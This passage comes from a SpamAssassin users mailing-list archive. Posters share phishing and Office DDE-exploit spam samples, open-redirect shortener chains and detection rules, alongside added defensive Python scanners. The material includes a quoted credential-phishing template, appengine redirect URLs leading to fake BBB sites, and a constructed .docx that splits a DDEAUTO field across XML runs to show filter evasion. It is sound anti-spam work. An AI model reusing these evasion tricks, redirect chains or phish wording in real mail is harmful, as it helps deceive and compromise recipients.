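            matched = str(ip) in resolver.query(target, "A")
        elif mech == "mx":
            mx_hosts = resolver.query(target, "MX")
            if len(mx_hosts) > 10:
                return "permerror"        # per-mechanism cap on MX address lookups
            matched = any(str(ip) in resolver.query(mx, "A") for mx in mx_hosts)
        elif mech == "ptr":
            for host in resolver.query(ip.reverse_pointer, "PTR")[:10]:
                forward_ok = str(ip) in resolver.query(host, "A")
                in_domain = host.lower() == target or host.lower().endswith("." + target)
                if forward_ok and in_domain:
                    matched = True
                    break
        elif mech == "include":
            spf = [t for t in resolver.query(arg, "TXT") if t.lower().startswith("v=spf1")]
            if len(spf) != 1:
                return "permerror"        # include target without exactly one SPF record
            sub = evaluate(spf[0], str(ip), arg, resolver, supported, skip_unknown)
            if sub == "permerror":
                return sub
            matched = sub == "pass"
        if matched:
            return QUALIFIER[qual]
    return "neutral"                      # nothing matched and no "all"


PARTIAL = ("all", "ip4", "include")       # the first-version mechanism set described in the post
```

For a record such as "v=spf1 a mx ptr ip4:203.0.113.0/24 ?all" the partial evaluator never looks at "a"/"mx"/"ptr" and falls through to the "?all" Neutral; the full one returns Pass when the MX's address matches, and PermError when a mechanism is unknown, an include target has no SPF record, or the record needs more than ten lookups, which is the usual reason a big company's record comes back PermError.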




Re: spample: Microsoft Office DDE exploit (in OpenXML attachment)

2017-10-31 Thread Chip M.
On Tue, Oct 31, 2017, David Jones  wrote: 
>Add the Lashback RBL.  I am trying to get this added to the default SA 
>rules.  See my post on 2017-10-17 in the following link and increase the 
>scores after some testing.

David, after your Lashback post, I had added it to my FP pipeline
(i.e. run from the desktop, NOT real-time) for evaluation, however
I had made a minor setup mistake.
Thanks for the reminder that prompted me to check and fix that. :)
If that proves useful, I'll add it to my post-gateway real-time
stack.

Thanks for your other suggestions. :)


Benny:
Thanks for the clamav submission page, however it did not work with
my browser (after NIMDA, I turned "off" all the whizbang security 
nightmare stuff). :(
You or anyone else is welcome to submit it there or anywhere. :)

"Rupert":
That was one of 30 that passed gateway RBL testing and
(plain vanilla) ClamAV.
It was _NOT_ "addressed to someone-else".
If you do a bit of DNS analysis on the Received headers, it will be
clearer.
You are correct that it failed SPF. :)
I checked all the others, and they too failed, which is somewhat
unusual.


*** All:
*** Clarification: 100% of these are being caught by my filters.
I posted to share a live sample, since there's lots of technical
analysis articles but I have not yet seen complete samples of all
the file vectors that are possible.

I'm mainly interested in insights into CONTENT based rules,
and more diverse samples. :)

For example, after the first wave of news, I added a word match rule
for "DDEAUTO", which has _NOT_ yet triggered.  That does trigger if
I change it to a gappy-word rule, after de-tagging these XML pairs:
DDE
AUTO
I had not expected that.

I particularly want to see an .ics sample.
Has anybody else seen much/any DDE attack variants?
- "Chip"




spample: Microsoft Office DDE exploit (in OpenXML attachment)

2017-10-31 Thread Chip M.
Starting Monday late pm (Iowa time), I've been seeing my first DDE
exploits, with significant volume.
Here's a spample, with only the account part of the To header munged:
http://puffin.net/software/spam/samples/0056_dde_auto.txt

The MIME part Content Types are all of the same form, with only the 
nine (9) digit long invoice number being different (same as used in
the Subject).  The date part is changing correctly.
So far, there's enough consistency there that it may be worth some
quick rules.

Here's a few of the Message-IDs:


















In all cases, the domain matches the domain in the From header.

So far, the From has always been in the form:
Invoicing 

The only SA rules that they're all hitting are:
TVD_SPACE_RATIO
TVD_SPACE_RATIO_MINFP

Internally, these were _NOT_ as I was expecting.
When the buzz about DDE first broke, I was expecting old style doc,
rtf, and ics (calendar) files, and restricted my rules to those.
Today's wave are all OpenXML, and the payload is in file
"word/document.xml".

If you take a close look at just the contents of ""
tag pairs, it appears they can easily obfuscate the payload. :(

I need to do a _LOT_ more reading, but for now, I've added 
seat-of-my-pants rules for exact word matches on:
DDE
instrText
AUTO
gfxdata

So far, using an older (v3.4.1) plain vanilla SA setup, my 
killrate with Bayes is 48% (without Bayes, it would have been 
about 30.4%).

My post SA filter has been killing them all, but that's due to my
aggressive rules and a bit of luck.
I've asked one of my people with less aggressive rules and more 
diverse ham to run some ham-only MassChecks using the above rules.
I'll share the results.

Has anyone seen the RTF or Calendar/.ics forms of this exploit?
If so, please-please-please post a spample.
- "Chip"
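Added example, not from Chip's post or his rules: a Python scanner that does what his gappy-word rule approximates, opening an OpenXML attachment, walking word/document.xml, joining the instrText runs between fldChar begin/end into one field code, and matching DDE/DDEAUTO on the joined string, so a field split across XML runs is still seen whole. The .docx and the carrier message are constructed in the block (with placeholder strings where a real field would name a program), and the scanner is shown over both the bare file and the message's attachments.

```python
import email
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from email import policy
from email.message import EmailMessage

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# Matches a DDE or DDEAUTO field code once the runs have been joined.
DDE_FIELD_RE = re.compile(r"^\s*DDE(AUTO)?\b", re.I)


def build_sample_docx(with_dde=True):
    """Constructed minimal .docx; the field code is split across two instrText runs."""
    field_runs = (
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
        '<w:r><w:instrText xml:space="preserve">AUTO "placeholder-program" "placeholder-argument" </w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>Invoice 123456789</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
    ) if with_dde else "<w:r><w:t>Invoice 123456789</w:t></w:r>"
    document_xml = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
                    f'<w:document xmlns:w="{W_NS}"><w:body><w:p>{field_runs}</w:p>'
                    "</w:body></w:document>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")   # stub; enough for the scanner
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


def extract_field_codes(docx_bytes):
    """Every field code in word/*.xml as one string, instrText runs joined."""
    codes = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            root = ET.fromstring(z.read(name))
            in_field, current = False, []
            for el in root.iter():
                tag = el.tag.rsplit("}", 1)[-1]
                if tag == "fldChar":
                    kind = el.get(f"{{{W_NS}}}fldCharType")
                    if kind == "begin":
                        in_field, current = True, []
                    elif kind == "end" and in_field:
                        codes.append("".join(current).strip())
                        in_field = False
                elif tag == "instrText" and in_field:
                    current.append(el.text or "")
                elif tag == "fldSimple":            # single-element field form
                    codes.append((el.get(f"{{{W_NS}}}instr") or "").strip())
    return codes


def find_dde_fields(docx_bytes):
    return [c for c in extract_field_codes(docx_bytes) if DDE_FIELD_RE.search(c)]


def build_sample_message(with_dde=True):
    """Constructed carrier e-mail with the sample .docx attached."""
    msg = EmailMessage()
    msg["From"] = "Invoicing <invoicing@example.invalid>"
    msg["To"] = "target@example.net"
    msg["Subject"] = "Invoice 123456789"
    msg.set_content("Please find your invoice attached.")
    msg.add_attachment(build_sample_docx(with_dde), maintype="application",
                       subtype="vnd.openxmlformats-officedocument.wordprocessingml.document",
                       filename="invoice_123456789.docx")
    return msg.as_bytes()


def scan_message(raw):
    """DDE field codes found in any zip-based (OpenXML) attachment of a raw message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = []
    for part in msg.iter_attachments():
        data = part.get_content()
        if isinstance(data, bytes) and data[:2] == b"PK":
            hits.extend(find_dde_fields(data))
    return hits
```

Because the match runs on the joined field code rather than on the raw XML, the "DDE" / "AUTO" split that defeated the exact-word rule does not matter; the same walk also covers headers, footers and other word/*.xml parts, which a rule restricted to document.xml would miss.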




phishing spam

2017-09-16 Thread Rajesh M
hello

how do we mark such email as spam where our customer is sent an email asking 
user to verify account to prevent the account being disabled.

i have provided below the source of such emails.

#
Hi metal@mycustomer.net.in ,

Recently we received some notifications regarding your
account:metal@mycustomer.net.in , which might be due to recent changes made
in your email or irregular login attempts on your account.

We will ensure that we block your account if we do not hear from you. Please
kindly click the link below to stop this attempts and reclaim your account.

 Continue 
verification

Thanks,
The Email Team
This email has been sent from an unmonitored email address. Please do not
reply to this message. We are unable to respond to replies.

2017 Email Administrator Inc. All Rights Reserved. |
 Privacy policy
#

thanks
rajesh



Re: new campaign: bitly & appengine.google

2017-09-13 Thread Chip M.
KAM, thanks!
I took a look at your rules, and like your scoring. :)
Over my years, I've seen enough BBB scare campaigns which use
shorteners, that perhaps it would make sense to add "KAM_SHORT"
to your additive list of metas (I forget what that's called).

To all the other repliers:
Thanks for your input.
All my BitLy spam complaints have been thru SpamCop, and (together
with my data) have left me with a poor impression of BitLy's abuse
handling.

For example, between 2017-Jul-11 and Aug-22, at one of my key
domains, 4.0% of the spam (all Snowshoe) contained the same 
shortener:
bit.ly/2sLdd2P
The SA killrate (generic install only) was 53.02% for those.
During that period, the Location domain ("programmingkeeda") was
almost always on URIBL's blocklist (mostly "black" sometimes
"red"), though not on SpamHaus or Surbl.

I reported at least four (4) samples via SpamCop between Jul-17
and Jul-20, usually with an explicit note/comment to BitLy.

As of this morning, that shortener is still active. :(

Next time I'll try a direct submission, based on the credibility
of some of you who state you've had good experiences. :)

If anybody does have a direct contact with somebody at BitLy that
they trust, I would still appreciate that (off-list).
7 years ago, I posted some rambling ideas about cooperative data
sharing with shortener providers:

http://mail-archives.apache.org/mod_mbox/spamassassin-users/201002.mbox/%3c20100224.0...@iowahoneypot.com%3e
About 4 years ago, I implemented HTTP HEAD and adding Location
URLs to my regular processing, and have been generally pleased
with its performance & efficacy. :)
I did include (and am using) the ability to include the SA score
in the Agent, and would like to have contact with any legit 
shortener providers who would use that (and other data).

My suggestion about using UDP was purely to improve performance
for the gateway filter, when used with an automatic smart 
quarantine approach, where the final decision would be made 
minutes later by a separate app.
For example, Splunk logging is often done via UDP, since it's 
typically viewed by humans, and a few second (or often minutes)
delay is not a big issue, and the potential for lost data packets
is less relevant than performance.
- "Chip"



new campaign: bitly & appengine.google

2017-09-12 Thread Chip M.
There's a new campaign that uses Bitly shorteners to some sort of
Google forwarder ("appengine").

Here's some sample Locations returned by HEADing the shorteners:

appengine.google.com/_ah/logout?continue=https://appengine.google.com/_ah/logout?continue=http://bbbcomplianceglobal.com/report.php?mn=##

appengine.google.com/_ah/logout?continue=https://appengine.google.com/_ah/logout?continue=http://bbbtax.com/getreport.php?ne=

appengine.google.com/_ah/logout?continue=http://bbbwork.com/abuse.php?number=#

appengine.google.com/_ah/logout?continue=https://appengine.google.com/_ah/logout?continue=http://bbbcompliancenetwork.com/compliance.php?ne=##

appengine.google.com/_ah/logout?continue=https://appengine.google.com/_ah/logout?continue=http://bbb-compliance.com/abuse.php?rt=###
I've hashed out the parts that look like tracking IDs, all of 
which have been pure numeric chars.

Here's the corresponding Subjects:
752566913589:407
8260420930:36
Incident:062881374904:149
Incident:22677610925:290
Incident:5858851682625:543

The message text is a fake BBB complaint.
I'll put a sample online tonight, if practical.

The SA scores have ranged from -2.2 to 1.5, with no useful 
patterns.

Does anyone have a contact at BitLy?  These would be trivially 
easy for them to block.
- "Chip"




block phishing spam

2017-08-27 Thread Rajesh M
hi

we are constantly getting spam which has the following in the body of the email

dear u...@domain.com

where u...@domain.com is the mailto email id, i.e. our customer's email id

is there a way to mark emails containing the mailto email id in the body of the 
email as spam ?

normal email communications never have such a scenario.

rajesh
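Added example, not from either of Rajesh's posts: Python that implements the check he asks for here and in the 2017-09-16 "phishing spam" post, testing whether one of the message's own recipient addresses appears in the visible body, and separately whether it sits in a "Dear ..."/"Hi ..." greeting. The three messages are constructed (the phish is modelled on the text Rajesh quoted); quoted reply lines are skipped because a reply legitimately echoes the original recipient's address.

```python
import email
import re
from email import policy
from email.utils import getaddresses

RECIPIENT_HEADERS = ("To", "Cc", "Delivered-To", "X-Original-To")
GREETING = r"\b(?:dear|hi|hello|greetings)\s*,?\s*"


def recipient_addresses(msg):
    addrs = set()
    for header in RECIPIENT_HEADERS:
        for _, addr in getaddresses([str(v) for v in msg.get_all(header, [])]):
            if addr:
                addrs.add(addr.lower())
    return addrs


def visible_body(msg):
    """Text of the preferred body part, tags stripped, quoted reply lines dropped."""
    part = msg.get_body(preferencelist=("plain", "html"))
    if part is None:
        return ""
    text = part.get_content()
    if part.get_content_type() == "text/html":
        text = re.sub(r"<[^>]+>", " ", text)
    return "\n".join(l for l in text.splitlines() if not l.lstrip().startswith(">"))


def recipient_in_body(raw):
    """Recipient addresses found in the body, flagged when used as the greeting."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    text = visible_body(msg).lower()
    hits = []
    for addr in sorted(recipient_addresses(msg)):
        if addr in text:
            greeted = re.search(GREETING + re.escape(addr), text) is not None
            hits.append({"address": addr, "in_greeting": greeted})
    return hits


# Constructed messages.
PHISH = b"""From: "The Email Team" <noreply@example.invalid>
To: user@example.net
Subject: Verify your account
Content-Type: text/plain; charset="us-ascii"

Hi user@example.net ,

Recently we received some notifications regarding your account: user@example.net ,
which might be due to recent changes made in your email.
Please click the link below to reclaim your account.
"""

HAM = b"""From: colleague@example.org
To: user@example.net
Subject: Re: meeting

Sure, attached. See you at 10.
"""

HAM_QUOTED = b"""From: colleague@example.org
To: user@example.net
Subject: Re: meeting

> From: user@example.net
> can you send the agenda?

Sure.
"""
```

Account notifications, list footers and "you are receiving this because ..." lines also carry the recipient's address, so the plain presence of the address is a small score; the address used as the salutation is the stronger signal and the one to weight.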



Re: Anyone else just blocking the ".top" TLD?

2017-07-05 Thread Chip M.
Just spotted my first snow with the TLD ".jetzt".
It's selling for $1.88 at NameCheap so should become widespread.

On Sat, 05 Nov 2016, at 11:54, @lbutlr (kreme.com) wrote:
>We get some (very little) real mail from info, biz, and name domains.
>All the other new domains are on a "prove you're not terrible"
>status. So far the only one to graduate is .name.

Yes, that's pretty much my approach. :)

Note that the ratio of ham to spam for ".email" has risen 
significantly, with several legit Muggle organizations 
(e.g. acronis, movietickets) buying and using that TLD of their
base name.
Even otherwise-Giga-Geeky "stackoverflow" has joined that trend.

I'm still killing that TLD by default, but have significantly
dropped its score in my FP pipeline.
- "Chip"



Re: Today's Google Docs phish

2017-05-04 Thread Chip M.
Alex, thanks for the spample!

I've only received one (so far), containing the same base domain
with the ".win" TLD, also freshly registered at NameCheap with
privacy protection and CloudFlare.


On Thu, 04 May 2017, Axb wrote:
>SA's redirect patterns detected these domains and my logs show 
>most were listed by the domain lists within a few minutes.

URIBL caught mine, in real-time. :)
Good job, ninjas!

I did a very quick (three months, one diverse domain) check on
UNPARSEABLE_RELAY hits, and it had an 18:1 ham to spam ratio. :(
Fortunately, ALL the ham was from Facebook/Instagram, so that 
rule has potential for tweakage.

John, how about a rule against the redirection parameter itself
(i.e. "redirect_uri")?  I suspect it'll hit too much ham, however
it would make a great meta combined with obscure/cheap TLDs,
and/or other characteristics.

I've added that to my own MassCheck queue, and will report back.
- "Chip"



spample: banking credential phish using linked image (with no text)

2017-01-28 Thread Chip M.
SpamAssassin caught this phish, however some tweaks would have
let it thru, and it's an interesting new (to me) approach, so I
figured I'd share it with y'all.

Full raw spample (with MUNGED email addresses): 
http://puffin.net/software/spam/samples/0053_phish_image.txt
At arrival time, the domain "alshimisiani" was only on 
URIBL Black (the webhost's SA does not run URIBL, so that was
caught by my post-SA filter).

The HTML link had all manner of weirdness (in particular, that
Google "data-saferedirecturl" thingie), so I did a raw HTTP GET
of the image, semi-thinking it was going to be borked or lame.
Instead, I saw this very nicely done, VERY convincing image:
http://puffin.net/software/spam/samples/0053_phish_image.png
I've never noticed that style before.  I've seen similar with
attached image(s), however I rarely pull down remote images.

For a while, I've been concerned that spammers would move to
more remote images in phish, and have been thinking about
adding arrival-time pull-down & analysis of them.

** Has anyone noticed this tactic, and, if so, has it been
going on for a while?


Also of interest is the main URL.
It looks like the site is legit and was cracked/hijacked.
The page used javascript and a meta refresh to redirect to a
different apparently-cracked site, with an interesting 3 hops
within that site, before the final pure javascript payload.

I don't have the time to analyze the js, however it is somewhat
unusual/different from what I've seen in the past.
If it's down by the time anyone legit checks it, feel free to
email me off-list for a copy (LEGIT geeks only and note that I'll
be mostly offline for the next 4-7 days).


I _VERY_ briefly researched the token "data-saferedirecturl", and
my first impression is that maybe it shouldn't occur in email, so
it may be a good test.
** What do the HTML gurus think?

Perhaps it would be worthwhile to MassCheck a meta of
"BODY_URI_ONLY" with highly phish-y From.RealNames?

I just checked the last 3 months of my best corpora, and ham
hits on "BODY_URI_ONLY" were in three categories (highest to 
lowest volume):
- DMARC reports
- ESP/bulk (with SA scores between -4.0 and 5.3)
- person-to-person with an image attachment
I'm already selectively "skip" listing all three scenarios, in
particular DMARC reports (i.e. I never "white" list, I have my
rules segmented into groups that can be easily skipped).
- "Chip"




Re: spample of not(?)-yet-registered "custom" URL Shortener in Phish

2016-09-25 Thread Chip M.
On Sun, 25 Sep 2016, RW wrote:
>If you mean you poison-pill anything with a redirect, then this
>doesn't seem all that clever because tinyurl is such a well known
>shortener.

I poison pill by default, not always. :)

If the arrival time HEAD is a redirect to a "skip" listed domain,
the poison pill is skipped (which is why I do the HEAD).

My quarantine is a smart/active quarantine, not a dumb/static one
so it's very rare for a legit ham shortener not to be released
semi or fully automatically.
Yes, there's a delay, however it's my view/opinion that anyone
who uses a shortener is self labelling the email as low priority.

My stats show that tinyurl is the most consistently abused of the
well known shorteners, so its poison pill score is higher than
some.  The other popular shorteners tend to have bursts of abuse.
It's less-dumb of the spammers to try this technique at tinyurl
first, then try it at BitLy/etc.

** I forgot to mention that while investigating this, I re-HEAD'd
all 2016 spam shorteners for my most diverse domain, and 87%
still redirect (i.e. 301 or 302 with a Location).  I briefly
skimmed the results, excluding any that did not look spammy
(most looked like snow or WP cracks).

That surprised even cynical me. :\
I'll be running a more thorough test, with more domains, soon.


>> * Does anyone have any idea of the significance of the "X-tiny"
> header in the Windows vs Linux output?  It's probably trivial.
>
>It seems to be a diagnostic header that's only added where the URL
>exits.

Thanks!  That makes sense. :)
- "Chip"



spample of not(?)-yet-registered "custom" URL Shortener in Phish

2016-09-24 Thread Chip M.
Here's a spample of a well done "Dropbox" Phish sent thru Gmail,
containing a custom URL shortener which (apparently) did _NOT_
exist at message arrival time:
http://puffin.net/software/spam/samples/0045_shortener_phish.txt
I MUNGED the To & From headers, however I left the original From
domain in the DKIM header.

My post SA filter does HEAD lookups of URL shorteners, with
logging of the full headers.
URL shorteners are (currently) low enough volume that I check any
"interesting" ones, in particular, phish.

Here's the server log entry:

[ HEAD "http://tinyurl.com/easystorage42" ]
HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2016 17:29:04 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: __cfduid=dc570dff5ac6a2bc68a5d2e9ff02f5f8b1474306144; expires=Tue, 
19-Sep-17 17:29:04 GMT; path=/; domain=.tinyurl.com; HttpOnly
Set-Cookie: tinyUUID=7e020645a4cd45051c05; expires=Tue, 19-Sep-2017 
17:29:03 GMT; path=/; domain=.tinyurl.com
Server: cloudflare-nginx
CF-RAY: 2e4ec1fa555d3816-ATL

Here's the HEAD headers the next day (same Code, albeit compiled
in a Windows app rather than Penguin-land):

[ HEAD for URL http://tinyurl.com/easystorage42 ]
HTTP/1.1 301 Moved Permanently
Date: Tue, 20 Sep 2016 19:08:17 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: __cfduid=db099f950a3ec03be684df56d1c5cb2191474398497; expires=Wed, 
20-Sep-17 19:08:17 GMT; path=/; domain=.tinyurl.com; HttpOnly
Set-Cookie: tinyUUID=7e18925a80f84470c686; expires=Wed, 20-Sep-2017 
19:08:16 GMT; path=/; domain=.tinyurl.com
Location: http://proj ect miya . com/images/index.htm
X-tiny: cache 0.0095739364624023
Server: cloudflare-nginx
CF-RAY: 2e5790b36552423d-MSP

** I put four blank spaces in the "Location", so nobody would
"be bothered". ;)  They were NOT in the actual output.

My first thought was network hiccup.  Then it struck me that this
was not a random/system generated one, rather it was one of those
"custom"/vanity(?) shorteners that often appear in ESP/snow.

I have no experience creating Shorteners.
*** Could someone who does, please weigh in on whether this may
be a new tactic? ***

If it is, it's almost clever.
For years, I've been poison pill scoring stuff like that, and
letting Quarantine re-testing sort things out. :)

* Does anyone have any idea of the significance of the "X-tiny"
header in the Windows vs Linux output?  It's probably trivial.


In general, this is a good example of the Phish I regularly see
sent via Gmail.  From.Realname is an oft phished target (never
fuzzed), SPF passes, and the English is generally well done.

The worst/best-done campaign (WOW/Blizzard/BattleNet) I've ever
seen went on for seven months, with no sign that Gmail even
noticed it. :\
- "Chip"
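
Added example (not Chip's post-SA filter): offline triage of a shortener link from a logged HEAD response, covering the two states shown in this thread (404 at arrival, 301 with a Location the next day) and the nested "continue=" open-redirect chains quoted further up the page. The shortener alias, the skip list, the redirect parameter names and the sample responses are constructed; the responses are modelled on the log entries above with a made-up target host. Nothing here touches the network, so the same function can be run again from a quarantine re-test.

```python
"""Arrival-time triage of URL-shortener links from a logged HTTP HEAD response.

Added example, not the poster's post-SA filter. Assumptions: SKIP_DOMAINS,
REDIRECT_PARAMS and the three sample responses below are constructed.
"""
from urllib.parse import parse_qs, urlsplit

SKIP_DOMAINS = {"docs.google.com", "github.com"}      # release without poison pill (assumption)
REDIRECT_PARAMS = ("continue", "url", "u", "redirect_uri", "target", "q")  # assumption
REDIRECT_CODES = {301, 302, 303, 307, 308}


def parse_head_response(raw: str) -> tuple[int, dict]:
    """Status code and headers from a raw 'HTTP/1.1 301 ...' + header-lines blob."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if line[0].isspace():          # folded continuation of the previous header
            continue
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())  # first Location wins
    return status, headers


def host_of(url: str) -> str:
    return (urlsplit(url if "://" in url else "http://" + url).hostname or "").lower()


def registrable(host: str) -> str:
    """Last two labels; a real deployment would consult the public suffix list."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def unwrap_redirect_chain(url: str, max_hops: int = 10) -> list[str]:
    """Peel nested open-redirect parameters without fetching anything, e.g.
    appengine.google.com/_ah/logout?continue=https://...?continue=http://target/...
    returns [outer, middle, http://target/...]."""
    chain = [url]
    for _ in range(max_hops):
        query = urlsplit(url if "://" in url else "http://" + url).query
        params = parse_qs(query, keep_blank_values=True)
        nxt = next((params[p][0] for p in REDIRECT_PARAMS if params.get(p) and params[p][0]), None)
        if not nxt or "." not in host_of(nxt):
            break
        chain.append(nxt)
        url = nxt
    return chain


def triage_shortener(short_url: str, raw_head: str) -> dict:
    """Poison pill by default; skip only when the final hop lands on a skip-listed domain."""
    status, headers = parse_head_response(raw_head)
    verdict = {"url": short_url, "status": status, "chain": [], "final": None}
    if status == 404:
        # Shortener is up but the alias does not exist (yet): the "custom alias
        # created after the mail went out" case. Pill now, re-test from quarantine.
        verdict["action"] = "poison-pill:unregistered-alias"
    elif status in REDIRECT_CODES and headers.get("location"):
        chain = unwrap_redirect_chain(headers["location"])
        dom = registrable(host_of(chain[-1]))
        verdict.update(chain=chain, final=dom,
                       action="skip" if dom in SKIP_DOMAINS else "poison-pill:redirect")
    else:
        verdict["action"] = "poison-pill:no-redirect"
    return verdict


# Constructed HEAD responses modelled on the log entries in the post (target host made up).
HEAD_DAY1 = """HTTP/1.1 404 Not Found
Date: Mon, 19 Sep 2016 17:29:04 GMT
Content-Type: text/html
Connection: keep-alive
Server: cloudflare-nginx
"""
HEAD_DAY2 = """HTTP/1.1 301 Moved Permanently
Date: Tue, 20 Sep 2016 19:08:17 GMT
Content-Type: text/html
Set-Cookie: tinyUUID=7e18925a80f84470c686; path=/; domain=.tinyurl.com
Location: http://cracked-wordpress.example/images/index.htm
X-tiny: cache 0.0095739364624023
Server: cloudflare-nginx
"""
HEAD_APPENGINE = """HTTP/1.1 301 Moved Permanently
Location: https://appengine.google.com/_ah/logout?continue=https://appengine.google.com/_ah/logout?continue=http://bbbwork.example/abuse.php?number=12345
"""

if __name__ == "__main__":
    for raw in (HEAD_DAY1, HEAD_DAY2, HEAD_APPENGINE):
        print(triage_shortener("http://tinyurl.com/easystorage42", raw))
```

The 404 branch is what makes the "not yet registered alias" trick visible: a dumb filter that only pills on a redirect would pass the message at arrival and never look again, whereas keeping the verdict and re-running the HEAD from quarantine turns the next-day 301 into the real target.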



Re: spample of "data" URL in well-crafted Phish

2016-09-24 Thread Chip M.
On Fri, 16 Sep 2016, John Hardin wrote:
>Chip, could you send me some spamples of non-image data: messages 
>offlist? The only ones I have anywhere are images.

Sent last week - thanks for your ongoing work on this John! :)

After that request, I decided to add (in my post SA filter)
a minimally scoring test for "data:", to make it easy to find new
variants (in my log viewer, I can flag any test as a "warning"
which flashes an ugly yellow UI thingamajig, so I don't have to
remember to Look for Stuff).

My first hits have all been a new Snowshoe image variant that may
be of (mild) general interest:
http://puffin.net/software/spam/samples/0044_data_embedded_snow.txt

Nowhere near as dangerous as Phish, but more "pee-in-the-pool"
evidence that sane senders should avoid this technique. :\
- "Chip"



Re: drive-by malware customized to the From.RealName of actual Friends

2016-09-24 Thread Chip M.
John,
thanks a TON for your efforts!  I was afraid this would be hard
to catch. :(
On the bright side, the campaign has been morphing, and they are
now (IMO) much less enticing, which is a partial victory. :)


** Update:
The emails have gone thru two more significant morphs, first with
To.Realname in the URL, then with neither Realname in the URL.

The cracked sites are now sometimes using meta-refresh instead of
or in addition to a server redirect.  The scripting at the
destinations has changed.  All remain eminently straight forward
to test.

They continue to use cracked GoDaddy domains, and it's taking
over a week to catch/"fix" the ones I've checked.
I took a look at GoDaddy's abuse reporting, and, alas, 
it's javascript-only. :(

*** Does anyone know of a clean/safe means to report these,
or have a contact at GoDaddy?

For more than 10 years, I've been tracking Realnames in the
"Friends" database of my hand-classification system.
I have a (batch) regression test that I can run daily to find
these, and would be happy to send the complete URLs to GoDaddy.
Disclaimer: my feed is LOW volume, however the delivery mechanism
is continuing to morph, so at the very least my trickle should
help GoDaddy keep a (putative) detection script up to date.

Plus, it's a TON more satisfying stymying the smarter-than-skwerl
class of spammers. :]
- "Chip"

P.S.  Some old friends let me crash with them for the duration of
the two dreaded anniversaries (9/11 & Nimda), so I was able to
get some useful work done. :)
Now I just have to get caught up on everything else!




Re: Catching well directed spear phishing messages

2016-09-15 Thread Chip M.
On Thu, 30 Jun 2016, Olivier Coutu wrote:
>The other way to fix that is to detect the lexical distance between the 
>sender's domain and your organisation's domains, e.g. by building a 
>plugin that uses https://en.wikipedia.org/wiki/Levenshtein_distance. 
>That could be done for a small number of domains within a few hours. In 
>my experience results are impressive and it's really awesome to block 
>such a personalized attack, although this spoofing method is not used 
>that often due to its cost. Mail me if you want the core of the code to 
>do those checks. 

That sounds VERY interesting, Olivier! :)

What language is it written in?
I'll be contacting you off-list. :)

Have you used that technique to generate tokens for regular
Phish prevention (e.g. all the myriad variations on Paypal)?


>You can keep a list of the executive names in your SA configuration, 
>but good luck on catching all variations.

That got me thinking...

Catching variations can NEVER be perfect, however,
performing EXACT matches is easy and reliable.

In most email systems, it's close to trivial to rewrite headers,
in particular the Subject header.

Given that (at each domain) the number of spear-phish-relevant
senders & recipients is very small, and we know whether they're
authenticated and sending from the "correct" IP(s), we can do
exact matching just on email "From" the pool of money-authorizers
and "To" the pool of money-movers, then modify the Subject at the
SYSTEM level with a "magic token" only known to the money-movers.

All other emails would remain unmodified.
Nobody else should know the current "magic token".

It took me about an hour of Coding to add that to my post-SA
filter and has been in use at one of my domains (a charity) for
over a month.  They're not at high risk, however they have been
receiving a steady trickle of well-targeted scams/malware and
have been worried, so were enthusiastic volunteers when I
explained what I wanted to experiment with.  They're not Techies,
however they're attentive, cautious, and awesome at 
asking questions & giving feedback. :)

I set it up on just one sending account (which has been regularly
spoofed), and three recipients.

I felt it would be easier (for the endusers) if we used a
two-part "magic token", with one part being human-readable &
"friendly", and one part being random (e.g. "[banana-38DYIT]"),
so the recipients could first screen on the easy to recognize &
remember part, then look up the random part on a printed list.
I asked the recipients to create their own list of "friendly"
tokens (and encouraged them to have fun with the task), then
generated a random token to pair with each, and set things up so
the two-part token automatically changes each weekend.  They keep
the printed list (tokens) in a drawer.

So far, there's been no technical issues.
Satisfaction is high and none of the three has expressed any
discomfort with seeing the extra token in their email clients.

After a couple of weeks, I sent a few RealName spoofs, and they
immediately spotted & reported all of them.  Disclaimer: they did
know I'd be testing them (and were enthusiastic about it).

One feature I'm considering adding, is removal of the token when
they reply to the Money-Authorizer/sender.  That would keep the
token private to the only people who need to see it.

** Can anyone think of any flaws in that, other than a cracked
Money-Authorizer account?
It's NOT idiot-proof, however it does give attentive non-techies
a simple & easy to see "code", and puts zero burden on the
Money-Authorizers, who tend to be the ones resisting change.
It's a lot easier on sysadmins than using a desktop addon. :)


*** Yet Another Idea (not yet implemented):
Many companies have a helpdesk email address that endusers are
told to forward questionable email to.
Great in theory, but the problem is that there's a human in that
loop, and most endusers are deeply reluctant to appear ignorant
or risk being chastised for "wasting time".

What if there was a mailbox that ran software that performed a
detailed technical analysis, then sent back a human friendly
report?

For example, with the "drive-by malware" campaign that I posted
last week, almost all travelled thru two IPs located in "unusual"
Nations, and the URL redirected to a 2nd URL at a newly
registered domain, that contained pure javascript.
The report might look something like:
You have previously received email from "James Kirk",
but never from the email address in this email.

It was sent from India, thru Great Britain.

It contained a link that was redirected to a brand
new domain, which looks like drive by malware.

Rating:  DANGER! DANGER! DANGER!

Blocking stuff like that campaign takes significant extra lookups
(particularly WHOIS) at gateway time, but time wouldn't be an
issue with a small batch of human selected "uncertain" emails.

Endusers should be told up front that the only time a human
Techie would 

